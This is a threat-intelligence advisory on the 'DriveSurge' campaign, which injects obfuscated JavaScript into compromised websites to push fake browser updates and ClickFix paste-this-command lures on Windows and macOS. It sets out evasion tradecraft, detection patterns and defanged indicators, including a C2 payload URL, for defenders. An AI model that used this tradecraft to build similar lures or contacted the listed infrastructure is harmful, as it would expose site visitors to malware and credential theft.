DriveSurge: Large-Scale ClickFix and FakeUpdates Campaign Targeting Windows and macOS via Compromised Websites
June 9th, 2026
High
Our Cyber Threat Intelligence Unit is monitoring a newly identified threat actor known as DriveSurge, which leverages ClickFix-style social engineering techniques and fake software update prompts to infect website visitors with malicious payloads. The campaign abuses compromised websites to display deceptive browser update notifications and CAPTCHA-style verification prompts, tricking users into manually executing malicious commands or downloading malware under the guise of legitimate updates. Once executed, the infection chain provides downstream threat actors with an opportunity to establish access to victim systems; the specific payloads and post-compromise activities vary depending on the malware delivered and the purchasing operator. The activity demonstrates an increasing trend of threat actors combining fake update lures, ClickFix-style delivery mechanisms, and living-off-the-land techniques to evade traditional defenses.
Technical Details
Threat Type: Drive-By Compromise / Malware Delivery via Traffic Distribution System
Severity: High
Affected Systems: Microsoft Windows endpoints (FakeUpdates and ClickFix delivery); macOS desktop systems (ClickFix delivery via clipboard hijacking and Terminal execution); any environment where users can browse to compromised websites using a standard web browser
Threat Actor: DriveSurge (named by Silent Push); also tracked as an unattributed Initial Access Broker (IAB) operating on a Pay-Per-Install (PPI) model. Attribution remains ongoing; no formal aliases confirmed from other vendors at present.
Tools and Components Observed:
zTDS (open-source Traffic Distribution System, v1.0.3 confirmed; publicly available at ztds[.]info; in use since at least 2015, in use by DriveSurge since at least September 2025).
Obfuscated JavaScript inject files (patterns: t.js, t.[12-char SHA-256].js, ext-b.[12-char SHA-256].js, jsrepo?rnd=)
FakeUpdates pages impersonating Google Chrome, Mozilla Firefox, Microsoft Edge, Safari, Opera, Brave, Yandex, Vivaldi, Samsung Internet, UC Browser, and other browsers
FakeUpdates ZIP payload (Windows): ZIP containing multiple DLLs and Browser Update.exe
ClickFix overlay (Windows and macOS): fake error or CAPTCHA-style prompts instructing clipboard paste into PowerShell or Terminal
Multi-stage macOS shell payload: curl-based downloader executing in /tmp, with immediate self-deletion post-execution
banerpanel[.]live: Advertisement Distribution System (ADS) with Russian-language admin interface, served alongside malicious injects on some compromised sites
Attack Chain:
Initial Access:
DriveSurge compromises legitimate, high-reputation websites and injects obfuscated JavaScript that silently loads a zTDS instance.
The injected code checks that the visitor does not have an active WordPress administrator session and has not already been served a payload, then routes the visitor to attacker-controlled infrastructure.
The inject uses Base64 encoding (atob()) and string concatenation to assemble zTDS URLs, with a failover mechanism cycling through multiple backup TDS servers if the primary fails.
Obfuscation is designed to prevent detection during routine website inspection.
Victim Profiling:
The zTDS instance profiles the visitor using IP, ASN, user agent, and referrer data to filter out bots, security researchers, and unwanted traffic.
Based on the profile, it serves one of two delivery methods to qualifying human visitors.
Defense Evasion:
The malicious inject actively checks for active WordPress administrator sessions and aborts execution if detected, limiting exposure to security teams who manage the compromised sites.
Multiple TDS failover servers ensure payload delivery even if one domain is blocked.
JavaScript obfuscation using atob() decoding and string concatenation reduces static detection. macOS payloads self-delete after execution.
Post-Exploitation:
DriveSurge operates on a Pay-Per-Install model; successfully infected endpoints are sold as access leads to downstream threat actors.
The specific post-exploitation activity on victim systems is determined by the purchasing threat operator and is not directly attributable to DriveSurge.
Impact
Initial Access Brokerage and Downstream Threat Amplification:
DriveSurge operates as a Pay-Per-Install Initial Access Broker, meaning successful infections are sold to downstream threat operators.
The full impact on a compromised organization is therefore determined by the purchasing actor, not DriveSurge itself, making containment scope difficult to assess from initial indicators alone.
Potential Credential and Sensitive Data Exposure:
FakeUpdates and ClickFix payloads are consistent with infostealer and loader delivery.
Confirmed macOS payloads establish outbound C2 communication to attacker-controlled infrastructure; the specific data accessed or exfiltrated is determined by the downstream operator.
Broad Victim Targeting via Trusted Websites:
Because DriveSurge compromises legitimate, high-reputation websites, victims may have limited indicators that a site has been compromised prior to being presented with a fake update or ClickFix prompt.
Any user visiting a compromised site using a standard browser is a potential target, regardless of browsing habits or security awareness posture.
Cross-Platform Exposure:
DriveSurge delivers tailored payloads to both Windows and macOS environments.
Organizations with mixed endpoint environments face simultaneous exposure across both operating systems from a single compromised site visit.
Data Exposure Risk:
Confirmed macOS payloads establish outbound C2 communications, creating the potential for data collection or exfiltration depending on downstream malware functionality.
Security Visibility Loss:
Malicious JavaScript injects are actively concealed from website administrators via WordPress administrator session checks, reducing the likelihood of detection by site owners.
Payload delivery pages are visually indistinguishable from legitimate browser update prompts.
Self-deleting macOS payloads reduce forensic artifact availability post-execution, increasing attacker dwell time.
Scalability of Impact:
Silent Push identified thousands of compromised websites actively serving DriveSurge injects, with additional pre-weaponized infrastructure identified at the time of reporting.
Detection Method
Security teams should monitor endpoint, network, and user activity telemetry for the following behavioral indicators:
Endpoint and Process Monitoring:
Monitor for browser processes spawning unexpected child processes following interaction with fake update prompts, or user downloads of ZIP archives containing DLL files alongside browser-themed executables such as Browser Update.exe from unfamiliar domains.
Monitor process execution events (e.g., Sysmon Event ID 1) for powershell.exe or cmd.exe processes spawned following webpage interaction, particularly where the command originated from a clipboard paste into a terminal or Windows Run dialog, the hallmark of ClickFix delivery.
Alert on obfuscated JavaScript loaded externally into visited websites following patterns such as t.js?site=[32-hex-char-string], t.[12-hex-chars].js, or ext-b.[12-hex-chars].js
Infrastructure fingerprints identified by Silent Push as associated with DriveSurge.
Network and Web Traffic Monitoring:
Detect outbound connections silently redirecting through a Traffic Distribution System, particularly zTDS infrastructure, identifiable by visitor profiling behavior where content served varies by client fingerprint.
Flag outbound HTTP/S requests loading external JavaScript with site= parameters containing 32-character hexadecimal strings, as these represent per-victim tracking beacons embedded in compromised websites.
Alert on outbound connections to IP addresses flagged in active bulletproof hosting threat intelligence feeds, particularly 91[.]92[.]240[.]127, observed as a ClickFix payload source in this campaign and listed in Silent Push's Bulletproof Hosting IOFA feeds.
User and Web Activity Monitoring:
Monitor for users interacting with ClickFix-style prompts (fake error overlays or "verification required" pages instructing clipboard paste into PowerShell or Terminal) and alert on clipboard copy-and-execute behavior involving command-line instructions originating from browser sessions.
Monitor for user-initiated downloads of archives from domains inconsistent with the currently visited site, which may indicate a FakeUpdates redirect.
Website Integrity Monitoring:
Scan web properties for externally loaded JavaScript matching DriveSurge injection patterns (t.js, t.[hex12].js, ext-b.[hex12].js) from domains outside your organization, and audit server-side files for injected script tags referencing unfamiliar external domains.
Review web server configurations for unauthorized lightweight beacon scripts that silently pass visitor telemetry to remote TDS infrastructure without site owner knowledge.
Post-Compromise Hunting:
Do not treat a blocked connection as full containment; DriveSurge's pay-per-install model means access may already have been sold to downstream operators before detection.
Hunt for staged payloads or downloaded archives in %TEMP%, %AppData%, or Downloads folders around the time of the suspicious browsing session, and review browser history and proxy logs for intermediate domain redirects consistent with zTDS routing.
Organizations with access to threat intelligence platforms can use NiceNIC-registered domain pivots to proactively identify DriveSurge infrastructure, as Silent Push identified NiceNIC as a registrar frequently used by this actor to register TDS and payload-delivery domains.
Indicators of Compromise
Type | Indicator | Description |
Domain | beacontrace[.]bond | Malicious zTDS inject domain serving t.js script |
Domain | jclforwarding[.]com | Compromised site used to serve Fake Update / ClickFix content |
Domain | check[.]first-node[.]rocks | Malicious domain serving fake Mozilla Firefox update page |
Domain | cptoptious[.]com | zTDS delivery domain used in obfuscated payload |
Domain | newtdsone[.]shop | zTDS delivery domain used in obfuscated payload |
Domain | captioto[.]com | zTDS delivery domain used in obfuscated payload |
Domain | banerpanel[.]live | Advertisement Distribution System (ADS) panel domain |
Domain | testio[.]ecartdev[.]com | Payload and development server identified in analysis |
Domain | ycyfugihih[.]cfd | Domain linked to DriveSurge registration email pivot |
Domain | brightson[.]icu | Pre-weaponized DriveSurge infrastructure domain |
Domain | coverlink[.]icu | Pre-weaponized DriveSurge infrastructure domain |
Domain | datumprobe[.]icu | Pre-weaponized DriveSurge infrastructure domain |
Domain | eraggifts[.]icu | Pre-weaponized DriveSurge infrastructure domain |
Domain | keyview[.]icu | Pre-weaponized DriveSurge infrastructure domain |
Domain | traceglimpse[.]icu | Pre-weaponized DriveSurge infrastructure domain |
Domain | tracekey[.]icu | Pre-weaponized DriveSurge infrastructure domain |
Domain | webgleam[.]info | Domain identified via Fingerprint 3 infrastructure pattern |
Domain | cptoptions[.]com | Suspicious domain loaded into jclforwarding[.]com |
thiagorivera197151[@]ycyfugihih[.]cfd | DriveSurge domain registration email (Fingerprint 6 pivot) | |
samuel_jordan16[@]flixtrend[.]net | Second DriveSurge domain registration email (Fingerprint 7 pivot) | |
IP Address | 46[.]226[.]166[.]57 | macOS payload delivery server and C2 |
IP Address | 147[.]45[.]42[.]200 | Second macOS payload delivery server; offline at time of reporting |
IP Address | 147[.]45[.]42[.]205 | Confirmed C2 endpoint for macOS malware payloads (port 8133) |
SHA-256 | 90aecb370dfb1a99a1f7de0a9c6842ab1b664521fddea16b0ec9a91f322646fc | ZIP file downloaded via fake Mozilla Firefox update page |
SHA-256 | 7aa15de93cf85729ddf970e8d7897f69ece3ca29608f73e784a9ba40c9cea18d | macOS payload binary retrieved from C2 server |
SHA-256 | 8ecc7108cd679316bf5900e84f19b256dc399902cdede646493f502ac872cc1a | macOS malware payload (alternate); distributed by both payload servers |
SHA-256 | e1ce4e6222396a58d13dddfe64c1dd21f1632bcbe11d1867d44bab4fc646883a | macOS malware payload (alternate); distributed by both payload servers |
SHA-256 | 29ac78c51bcdfe68c64830bdeb6e41437dd55e2691149741c9b78be03b6c82ea | Malicious server body SHA-256 (Fingerprint 4) |
SHA-256 | a84b032b49773c2318b11b1164d1aada69e940229aedbf8185c33fc7dd1d2cdf | Malicious server body SHA-256 (Fingerprint 4 alternate) |
SHA-256 | 428bd0b0ac36dfdd223b3953dbe61c0baf227f893310b03e7afe3111462019c6 | Data hash linked to jclforwarding[.]com web resources |
File Name | t.js | Malicious injected JavaScript file (Fingerprint 1 pattern) |
File Name | Browser Update.exe | Fake browser update executable dropped via ZIP file |
File Name | script.js | Injected JavaScript file served by check[.]first-node[.]rocks |
File Name | banner-js[.]php | Script loaded into compromised sites via banerpanel[.]live |
File Name | changelog.txt | Publicly accessible file on zTDS server confirming TDS version history |
URL | hxxps[://]newtdsone[.]shop/jsrepo?rnd= | zTDS payload fetch URL embedded in obfuscated JavaScript |
URL | hxxps[://]cptoptious[.]com/jsrepo?rnd= | zTDS payload fetch URL embedded in obfuscated JavaScript |
URL | hxxps[://]captioto[.]com/jsrepo?rnd= | zTDS payload fetch URL embedded in obfuscated JavaScript |
URL | hxxp://46[.]226[.]166[.]57/ce3cbfc887?force=1 | C2 URL delivering macOS malware payload |
Recommendations
Educate users to never copy and paste commands from browser pop-ups, fake error messages, or "fix required" prompts into their terminal or PowerShell window, as ClickFix campaigns rely entirely on social engineering and voluntary command execution rather than software exploitation.
Download browser updates only through the browser's built-in update mechanism (About > Check for Updates) rather than from prompts appearing on external websites.
Perform a full forensic review of affected systems, focusing on browser process activity, unexpected child process execution chains, and files downloaded or written to disk during or after the suspected infection window.
Review all scheduled tasks, registry persistence keys, and startup entries created around the time of the initial suspicious execution, and validate their triggers, actions, and referenced binary paths before declaring containment.
Implement web proxy inspection policies that flag or block redirects through unknown intermediate domains between an intended website destination and a file download.
Implement a Content Security Policy (CSP) header that restricts which external domains are permitted to load JavaScript on your web properties, which would prevent or alert on DriveSurge-style script injections.
Enforce multi-factor authentication across all critical systems and remote access services to reduce the impact of credential theft resulting from a successful infection.
Initiate host isolation, memory capture, and full artifact collection before declaring containment on any endpoint where ClickFix execution or a FakeUpdates download is confirmed.
Conclusion
DriveSurge is a sophisticated threat operation that exploits users' trust in familiar websites and routine-looking browser prompts to silently deliver malware across thousands of compromised websites. Organizations should treat any ClickFix or FakeUpdates incident not as an isolated user error but as a potential entry point for a broader compromise. Timely isolation, thorough forensic review, credential rotation, and awareness of downstream threat actors are essential to limiting the blast radius of a successful DriveSurge infection. Ongoing monitoring of DriveSurge's evolving infrastructure fingerprints, as documented by Silent Push, should be incorporated into threat intelligence programs to enable preemptive blocking before users are exposed.